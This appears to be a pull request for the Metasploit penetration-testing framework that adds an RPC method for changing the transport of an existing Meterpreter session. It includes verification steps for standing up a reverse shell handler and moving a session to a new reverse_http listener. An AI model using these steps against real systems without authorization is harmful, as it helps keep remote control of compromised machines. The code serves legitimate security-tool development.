### PR TITLE
add rpc call to change meterp transport

### DIFF
--- a/lib/msf/core/rpc/v10/rpc_session.rb
+++ b/lib/msf/core/rpc/v10/rpc_session.rb
@@ -395,6 +395,37 @@ class RPC_Session < RPC_Base
     rpc_meterpreter_run_single( sid, "run #{data}")
   end
 
+  # Changes the Transport of a given Meterpreter Session
+  #
+  # @option opts [String] :transport The transport protocol to use (e.g. reverse_tcp, reverse_http, bind_tcp etc)
+  # @option opts [String] :lhost  The LHOST of the listener to use
+  # @option opts [String] :lport The LPORT of the listener to use
+  # @option opts [String] :ua The User Agent String to use for reverse_http(s)
+  # @option opts [String] :proxy_host The address of the proxy to route transport through
+  # @option opts [String] :proxy_port The port the proxy is listening on
+  # @option opts [String] :proxy_type The type of proxy to use
+  # @option opts [String] :proxy_user The username to authenticate to the proxy with
+  # @option opts [String] :proxy_pass The password to authenticate to the proxy with
+  # @option opts [String] :comm_timeout Connection timeout in seconds
+  # @option opts [String] :session_exp  Session Expiration Timeout
+  # @option opts [String] :retry_total Total number of times to retry etsablishing the transport
+  # @option opts [String] :retry_wait The number of seconds to wait between retries
+  # @option opts [String] :cert  Path to the SSL Cert to use for HTTPS
+  # @return [Boolean] whether the transport was changed successfully
+  def rpc_meterpreter_transport_change(sid,opts={})
+    session = _valid_session(sid,"meterpreter")
+    real_opts = {}
+    opts.each_pair do |key, value|
+      real_opts[key.to_sym] = value
+    end
+    real_opts[:uuid] = session.payload_uuid
+    result = session.core.transport_change(real_opts)
+    if result == true
+      rpc_stop(sid)
+    end
+    result
+  end
+
 
   # Returns the separator used by the meterpreter.
   #

--- a/lib/msf/core/rpc/v10/rpc_session.rb
+++ b/lib/msf/core/rpc/v10/rpc_session.rb
@@ -397,6 +397,7 @@ class RPC_Session < RPC_Base
 
   # Changes the Transport of a given Meterpreter Session
   #
+  # @param sid [Fixnum] The Session ID of the `Msf::Session`
   # @option opts [String] :transport The transport protocol to use (e.g. reverse_tcp, reverse_http, bind_tcp etc)
   # @option opts [String] :lhost  The LHOST of the listener to use
   # @option opts [String] :lport The LPORT of the listener to use


### PR DESCRIPTION
this rpc method allows the user to change transport
on an existing meterp session. if it's successful
it will close the old 'session' tied to the previous transport

MSP-12722

VERIFICATION STEPS
- [x] get a reverse_tcp meterp shell on a box
- [x] `use exploit/multi/handler`
- [x] `set PAYLOAD windows/meterprerter/reverse_http`
- [x] `set LPORT 8001`
- [x] `run -j`
- [x] `load msgrpc`
- [x] connect the msfprc client to theRPC server that you just stood up
- [x] in the msfrpc interface: `opts = { transport: 'reverse_http', lhost: '192.168.172.1', lport: 8001}`
- [x] replace lhost value with your lhost obviously
- [ ]`rpc.call('session.meterpreter_transport_change', 1, opts)`
- [x] the 1 is the session id, so change it as needed
- [x] VERIFY the old session is killed and a new one opens up on your reverse_http listener
